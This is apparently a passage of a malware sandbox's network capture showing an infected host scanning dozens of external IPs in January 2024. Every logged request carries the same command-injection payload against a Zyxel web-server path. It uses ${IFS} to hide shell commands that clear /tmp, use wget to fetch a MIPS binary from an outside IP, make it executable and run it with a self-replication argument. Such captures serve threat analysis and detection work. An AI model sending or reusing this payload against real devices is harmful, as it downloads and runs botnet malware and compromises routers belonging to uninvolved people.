                                                Jan 29, 2024 07:07:34.021847010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                843192.168.2.23604004.90.84.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021866083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                844192.168.2.2355224193.62.25.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021931887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                845192.168.2.235994040.29.174.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.021965027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                846192.168.2.2359056126.190.100.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022006035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                847192.168.2.2359198162.157.104.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022061110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                848192.168.2.2360602203.205.161.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022075891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                849192.168.2.2336854163.75.252.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022109985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                850192.168.2.2350472152.28.254.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022138119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                851192.168.2.2358844134.249.212.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022181034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                852192.168.2.2351802123.5.110.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022214890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                853192.168.2.2356618128.47.77.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022262096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                854192.168.2.2349810175.46.101.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022289991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                855192.168.2.2341558208.3.53.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022331953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                856192.168.2.235589269.106.64.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022370100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                857192.168.2.234478436.46.72.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022409916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                858192.168.2.233596668.76.148.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022444010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                859192.168.2.2347782166.110.126.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022488117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                860192.168.2.2359166178.39.215.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022536039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                861192.168.2.2359444173.130.139.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022583008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                862192.168.2.23586468.2.77.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022614002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                863192.168.2.2359030218.188.54.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022638083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                864192.168.2.2359218202.144.66.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022694111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                865192.168.2.235221499.167.147.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022710085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                866192.168.2.2360030173.60.73.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022762060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                867192.168.2.2345062149.106.24.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022780895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                868192.168.2.2344874119.161.4.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022813082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                869192.168.2.233993246.3.14.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022861004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                870192.168.2.2358426135.209.48.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022888899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                871192.168.2.2344018194.126.162.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022933960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                872192.168.2.235708050.127.191.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.022964954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                873192.168.2.234834692.116.51.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023003101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                874192.168.2.2358658206.229.50.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023032904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                875192.168.2.2347188190.163.195.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023071051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                876192.168.2.235798037.212.4.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023113012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                877192.168.2.2345818128.233.232.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023149967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                878192.168.2.2346828194.54.109.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023174047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                879192.168.2.233797492.234.162.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023252964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                880192.168.2.235657875.32.69.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023263931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                881192.168.2.2354550145.153.133.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023300886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                882192.168.2.2341960106.179.103.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023328066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                883192.168.2.234960854.37.212.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023392916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                884192.168.2.2343342107.130.213.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023406029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                885192.168.2.235757664.128.115.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023473978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                886192.168.2.233516494.153.225.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023509026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                887192.168.2.235175072.182.175.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023545980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                888192.168.2.23536229.190.125.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023618937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                889192.168.2.2340412107.37.25.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023639917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                890192.168.2.2347646126.239.222.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023677111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                891192.168.2.2333326194.161.246.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023696899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                892192.168.2.23562962.57.169.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023746967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                893192.168.2.2355612119.62.68.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023822069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                894192.168.2.2346816105.200.157.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023861885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                895192.168.2.234685032.183.182.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023870945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                896192.168.2.2342134101.144.219.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023905993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                897192.168.2.2345918170.214.25.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023938894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                898192.168.2.2346942153.74.31.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.023996115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                899192.168.2.233781235.36.138.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024040937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                900192.168.2.2356704126.86.109.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024058104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                901192.168.2.235705872.39.125.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024085999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                902192.168.2.2344944123.88.12.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024142981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                903192.168.2.234564063.250.57.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024177074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                904192.168.2.2352868222.64.125.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024224043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                905192.168.2.2357784209.38.240.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024257898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                906192.168.2.2332978126.66.241.119443
                                                TimestampBytes transferredDirectionData
